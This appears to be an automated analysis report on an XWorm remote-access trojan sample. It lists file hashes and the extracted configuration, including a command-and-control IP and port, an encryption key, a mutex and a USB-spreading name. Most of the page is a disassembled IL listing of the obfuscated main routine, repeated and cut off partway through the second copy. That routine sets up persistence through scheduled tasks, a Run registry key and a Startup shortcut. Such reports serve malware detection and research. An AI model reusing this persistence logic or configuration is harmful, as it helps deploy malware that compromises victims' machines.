5922ffeb6ed95c70df6e06260204344b
PE Executable | MD5: 5922ffeb6ed95c70df6e06260204344b | Size: 66.56 KB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 5922ffeb6ed95c70df6e06260204344b
|
| Sha1 | bbd982fac5aacb2f6deb7b4bd6ac97cca4f58d9b
|
| Sha256 | d6536dd169868aa8f781d58323d1cd2b34102d31d62375f6befca3c4b2385152
|
| Sha384 | 4b2a7de6e10c02f1c51cbb7bf2c77a9ea3ba42409b12d4d4c9c76c2d049e5610f3b5ccc81adc5e2e63355b9856c1d730
|
| Sha512 | 49c7838422a359795d32030ee430f8ba61678b882529a08a36c3af3eb1f6466cf3a2102f0aad9106709d79b26ab719c0b745230219fc5f0edd25f316dc670a5a
|
| SSDeep | 1536:fwlz0IrU/PRUNJDsDkbZHInH46cAJ28OT96jV:a3oPREDrbZHylJOT965
|
| TLSH | 29537C183BE50611E6FEAFF558F17252C276B753D903965F64C8418A1B23AC9CE803FA
|
PeID
|
Config. Field0 | Value |
|---|---|
| Mutex | 0SDTE1E2ZYjZQsFi |
| Hosts | 172.245.27.131 |
| Port | 6000 |
| KEY | 12581258 |
| USBNM | <XWormmm> |
| LoggerPath | %AppData% |
| family | xworm |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | x.exe |
| Full Name | x.exe |
| EntryPoint | System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::PRSjdVIseupSuEuwNEWUqsL9DodYdTWDMOTDAD7CCw1FeEtEPkdIJC03iXDza4H32K() |
| Scope Name | x.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | x |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 302 |
| Main Method | System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::PRSjdVIseupSuEuwNEWUqsL9DodYdTWDMOTDAD7CCw1FeEtEPkdIJC03iXDza4H32K() |
| Main IL Instruction Count | 313 |
| Main IL | ldsfld System.Int32 PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::X85rbyJUR0awzrd1Q5mk6u6tp2gZyHURMTTkJlAxqksgjQ47lNJ1nIxKD2doJ8lKQU ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::MNMH3nkLnmahlwLJKCDLHQgZxyuQUEQxZaG7D54ywAs24WyNho74bOeUx4bwxi3OdZ call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::MNMH3nkLnmahlwLJKCDLHQgZxyuQUEQxZaG7D54ywAs24WyNho74bOeUx4bwxi3OdZ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::qR2fasNhgfERDDPt716ubTeRwxik1wRz6dSp9rBntaBg7MempuscedhlRl6FJ1FcgG call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::qR2fasNhgfERDDPt716ubTeRwxik1wRz6dSp9rBntaBg7MempuscedhlRl6FJ1FcgG ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::vZ7tbLBXeRG6BskPrAFbIXc63pM5B7q3nYmZ1psiYb9x1ilJJIApHPBjg7Bv6A1u5C call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::vZ7tbLBXeRG6BskPrAFbIXc63pM5B7q3nYmZ1psiYb9x1ilJJIApHPBjg7Bv6A1u5C ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::Ik6imeFKPdr87LN8QfRDp0QIX2GWSTwRkHsfBCK0EB4TUqqWuypxG1e24BLERHyFBQ call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::Ik6imeFKPdr87LN8QfRDp0QIX2GWSTwRkHsfBCK0EB4TUqqWuypxG1e24BLERHyFBQ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::NLJsNphJ3A9OTPIud6AL5g37a5CONJbYZ1AGAfcgKnNiNBmJutzZJZWW8nXAJzJMjj call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::NLJsNphJ3A9OTPIud6AL5g37a5CONJbYZ1AGAfcgKnNiNBmJutzZJZWW8nXAJzJMjj ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::FdztcFi8aodkDy9WySCof3afVN99hCjoYw4LWQmRpYWPrUGoxUclloOnlknAzdzQKD call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::FdztcFi8aodkDy9WySCof3afVN99hCjoYw4LWQmRpYWPrUGoxUclloOnlknAzdzQKD ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::69fPJWnr1s6KPtDDgxRRE5ZpGw6BqyYXzD9JjGGPPgzG8t3jdBTvT5gHiiezyTUZOF call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::69fPJWnr1s6KPtDDgxRRE5ZpGw6BqyYXzD9JjGGPPgzG8t3jdBTvT5gHiiezyTUZOF ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx leave.s IL_00CB: call System.Boolean Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::HCda82cImj4N1hsS7kiOfdIyrTeGlZoIf9aO3Y8Fh() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00CB: call System.Boolean Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::HCda82cImj4N1hsS7kiOfdIyrTeGlZoIf9aO3Y8Fh() call System.Boolean Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::HCda82cImj4N1hsS7kiOfdIyrTeGlZoIf9aO3Y8Fh() brtrue.s IL_00D8: call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::zwKitwCFs1TD0FjDVk28xJMPTNglAwBoKyP3cOGy7pha6P7cmNJeXTpSEtRtfc49Me() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::zwKitwCFs1TD0FjDVk28xJMPTNglAwBoKyP3cOGy7pha6P7cmNJeXTpSEtRtfc49Me() leave.s IL_00EE: call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::xxYfkRITJZtSs17CAQmY5wLzVhFGFnrqIwzwPyA9RCckOFg43nAE7onyFMngvnQ4o1() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00EE: call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::xxYfkRITJZtSs17CAQmY5wLzVhFGFnrqIwzwPyA9RCckOFg43nAE7onyFMngvnQ4o1() call System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::xxYfkRITJZtSs17CAQmY5wLzVhFGFnrqIwzwPyA9RCckOFg43nAE7onyFMngvnQ4o1() ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::69fPJWnr1s6KPtDDgxRRE5ZpGw6BqyYXzD9JjGGPPgzG8t3jdBTvT5gHiiezyTUZOF ldstr \ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_5 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0135: ldloc.0 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_014C: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_6 ldloc.s V_6 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::3orFA7yM2T36YV8nbd0u4uPaqVTIutE9MOZnJOVlp call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0177: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0177: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_9 ldloc.s V_9 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.Mp9SfO7QuK3KcSemWTiEg5gSj5gdYK57s6l0XjNcnUz7dKiWbylUQKTZ4Ig8jhPrZN2kXqztYE5MRtAOJchIplpqVEbzPNth5F::GSsRUoyDZaU9kbN24LKB9AMvdFuvUO7NQ71a91MUB1TUi88aXo8USm49cUdQBDbzwofzN0uWak6TxVVRbuxYH6ZlTGkW1482G4() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_01DD: ldloc.s V_9 ldloc.s V_9 ldc.i4.5 <null> newarr System.String stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_14 ldc.i4.1 <null> ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_14 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_14 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_14 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_0221: ldloc.s V_9 ldloc.s V_9 ldc.i4.5 <null> newarr System.String stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_14 ldc.i4.1 <null> ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_14 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_14 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_14 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_8 ldloc.s V_8 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0242: call My.gFRJ7adPVp0lTbgBoJPN4Iqk8ISbQXjEfqYkX6N1M1Geb7qlVHzwGIQTgOkD8xUzKP My.wFtyNwEgXrzb3zUOedBwCwqJFiR7GBpnynpHRsO52LO2Kzhu4pBM9ZJAqnCO4fTDuj::pJCIegFpr7nNWIJk1orLoSV9mIJR5Yhl2xEm9eS3226kT7jdeaanpo3AjjdQU5VMLc() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0242: call My.gFRJ7adPVp0lTbgBoJPN4Iqk8ISbQXjEfqYkX6N1M1Geb7qlVHzwGIQTgOkD8xUzKP My.wFtyNwEgXrzb3zUOedBwCwqJFiR7GBpnynpHRsO52LO2Kzhu4pBM9ZJAqnCO4fTDuj::pJCIegFpr7nNWIJk1orLoSV9mIJR5Yhl2xEm9eS3226kT7jdeaanpo3AjjdQU5VMLc() call My.gFRJ7adPVp0lTbgBoJPN4Iqk8ISbQXjEfqYkX6N1M1Geb7qlVHzwGIQTgOkD8xUzKP My.wFtyNwEgXrzb3zUOedBwCwqJFiR7GBpnynpHRsO52LO2Kzhu4pBM9ZJAqnCO4fTDuj::pJCIegFpr7nNWIJk1orLoSV9mIJR5Yhl2xEm9eS3226kT7jdeaanpo3AjjdQU5VMLc() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_027D: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_027D: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::kvFWJmMqv9n1Y4z7YiAuxlRsMkMfSBCnZLyAQD6Mj9fqiHTEgQUIgCgKl2858WjtFx call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_12 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldloc.s V_12 stelem.ref <null> ldloc.s V_15 stloc.s V_16 ldloc.s V_16 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_17 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_17 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0302: stloc.s V_18 ldloc.s V_16 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_12 stloc.s V_18 ldloc.s V_18 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_19 ldloc.s V_19 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_19 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_18 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_19 ldloc.s V_19 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_19 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_18 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_18 ldloc.s V_12 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::ibGwo02F0hHoRnpgQeunIWUjwkfx0yX2dIQx1fPrz leave.s IL_0381: call System.Void Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::RQ31YCWHMplVmuKuI8uDLmuWuwrsameCE13amErFw() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_13 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0381: call System.Void Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::RQ31YCWHMplVmuKuI8uDLmuWuwrsameCE13amErFw() call System.Void Stub.aX5RQw4G7VsEailsJPfwB8TJQY9SwFFkhTKaePBmu::RQ31YCWHMplVmuKuI8uDLmuWuwrsameCE13amErFw() call System.String Stub.Mp9SfO7QuK3KcSemWTiEg5gSj5gdYK57s6l0XjNcnUz7dKiWbylUQKTZ4Ig8jhPrZN2kXqztYE5MRtAOJchIplpqVEbzPNth5F::GSsRUoyDZaU9kbN24LKB9AMvdFuvUO7NQ71a91MUB1TUi88aXo8USm49cUdQBDbzwofzN0uWak6TxVVRbuxYH6ZlTGkW1482G4() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0397: ldnull call System.Void Stub.a2rnf7lhy7BEyRxqQrxHXsFwQWZG8mNzqF0PFF2Df::7XkZMx68oy857GWUnxycYbLP5AO7ID536oDfD9VIc() ldnull <null> ldftn System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::NyxWrNEoO1bdVrHPCv40mAy24nbv3mgTanl9FPn3QfQrAWHtyk7apU6sxRc2ihV5yQa6Bw3PGaFAEiwEvqzWuA1KZB00PLvdC0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::V9JFQYxqMcMCb005MAUreV1SmlwPngTns6mDAIVjAaF7ZWW8tmXIVOe3dljGhRFBGpXzBbmvkSyACAwGyy5SJylCZw9NuI8PeR() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
| Module Name | x.exe |
| Full Name | x.exe |
| EntryPoint | System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::PRSjdVIseupSuEuwNEWUqsL9DodYdTWDMOTDAD7CCw1FeEtEPkdIJC03iXDza4H32K() |
| Scope Name | x.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | x |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 302 |
| Main Method | System.Void Stub.gCHMKbYir35tZN6c22MczIblL74wiDNJKJApitbCJod0IS3PTEiWzYlpLQwwaapd6o::PRSjdVIseupSuEuwNEWUqsL9DodYdTWDMOTDAD7CCw1FeEtEPkdIJC03iXDza4H32K() |
| Main IL Instruction Count | 313 |
| Main IL | ldsfld System.Int32 PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::X85rbyJUR0awzrd1Q5mk6u6tp2gZyHURMTTkJlAxqksgjQ47lNJ1nIxKD2doJ8lKQU ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::MNMH3nkLnmahlwLJKCDLHQgZxyuQUEQxZaG7D54ywAs24WyNho74bOeUx4bwxi3OdZ call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::MNMH3nkLnmahlwLJKCDLHQgZxyuQUEQxZaG7D54ywAs24WyNho74bOeUx4bwxi3OdZ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::qR2fasNhgfERDDPt716ubTeRwxik1wRz6dSp9rBntaBg7MempuscedhlRl6FJ1FcgG call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::qR2fasNhgfERDDPt716ubTeRwxik1wRz6dSp9rBntaBg7MempuscedhlRl6FJ1FcgG ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::vZ7tbLBXeRG6BskPrAFbIXc63pM5B7q3nYmZ1psiYb9x1ilJJIApHPBjg7Bv6A1u5C call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::vZ7tbLBXeRG6BskPrAFbIXc63pM5B7q3nYmZ1psiYb9x1ilJJIApHPBjg7Bv6A1u5C ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::Ik6imeFKPdr87LN8QfRDp0QIX2GWSTwRkHsfBCK0EB4TUqqWuypxG1e24BLERHyFBQ call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::Ik6imeFKPdr87LN8QfRDp0QIX2GWSTwRkHsfBCK0EB4TUqqWuypxG1e24BLERHyFBQ ldsfld System.String PNpxg02HOS0jR4eLr4TcIzKddzIEdVY1TZGjssgS9qUtw9hETciSjxAKAvoEbViLzG::NLJsNphJ3A9OTPIud6AL5g37a5CONJbYZ1AGAfcgKnNiNBmJutzZJZWW8nXAJzJMjj call System.Object Stub.i3iECTfSa4Z8sgMdyGwAHu1ogKbOG3ndb4UhSRboa::RO8Va30HDXrboyl9wzfkITeBSqIH00MVdVO1hUDVV(System.String) call System.String 